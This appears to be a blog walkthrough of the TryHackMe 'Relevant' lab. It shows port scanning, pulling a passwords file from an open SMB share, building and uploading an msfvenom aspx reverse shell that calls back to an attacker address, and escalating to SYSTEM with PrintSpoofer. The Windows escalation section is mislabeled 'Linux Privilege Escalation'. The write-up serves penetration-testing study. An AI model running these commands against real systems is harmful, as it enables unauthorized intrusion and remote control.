Demonstrating Black Box Penetration Testing | TryHackMe Relevant

In this post, we covered a black box penetration testing challenge where we performed initial port scanning, found network shares from which we extracted sensitive data and uploaded a reverse shell generated by Msfvenom. After gaining access, we found that the machine configuration allows for the exploitation of printspoofer which led to root access. This was part of TryHackMe Relevant.

Offensive Security Certified Professional Study Notes and Guide

Task Description

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

• User.txt
• Root.txt

Additionally, the client has provided the following scope allowances:

• Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
• Locate and note all vulnerabilities found
• Submit the flags discovered to the dashboard
• Only the IP address assigned to your machine is in scope
• Find and report ALL vulnerabilities (yes, there is more than one path to root)

(Roleplay off)I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field.

Note — Nothing in this room requires Metasploit

Highlights

Penetration Testing Methodology

1. Reconnaissance
2. Enumeration
3. Exploiting
4. Privilege Escalation

Port Scanning Results

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2020-10-03T23:01:57+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
|_ssl-date: 2020-10-03T23:02:37+00:00; 0s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-10-03T16:02:00-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-03T23:02:01
|_  start_date: 2020-10-03T22:54:55

Listing Network Shares & Extracting Data

$ smbclient -L //10.10.11.52
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

$ smbclient //10.10.11.52/nt4wrksv
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

        7735807 blocks of size 4096. 4951539 blocks available
smb: \> get passwords.txt 
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

Uploading Reverse Shell to Network Shares

$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.22.11 lport=4444 -f aspx -o shell.aspx

smb: \> put shell.aspx 
putting file shell.aspx as \shell.aspx (12.9 kb/s) (average 7.9 kb/s)
smb: \> ls
  .                                   D        0  Thu Aug 27 22:48:34 2020
  ..                                  D        0  Thu Aug 27 22:48:34 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020
  shell.aspx                          A    38409  Thu Aug 27 22:48:37 2020
  test.txt                            A        5  Thu Aug 27 22:42:10 2020

        7735807 blocks of size 4096. 4946700 blocks available
smb: \>

kali@kali:/data/vpn$ msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.8.22.11
lhost => 10.8.22.11
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.8.22.11:4444

Linux Privilege Escalation

Checking the privileges with getpriv in the Meterpreter session reveals that we are granted with SeImpersonatePrivilege.

meterpreter > getprivs

Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege

Exploiting PrintSpoofer Vulnerability

PrintSpoofer is an exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.

To escalate privileges, the service account must have SeImpersonate privileges. To execute:

PrintSpoofer.exe -i -c cmd

With appropriate privileges this should grant system user shell access. Download the exploit from this link.

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system

Room Answers | TryHackMe Relevant

Room answers can be found here

Video Walkthrough | TryHackMe Relevant Walkthrough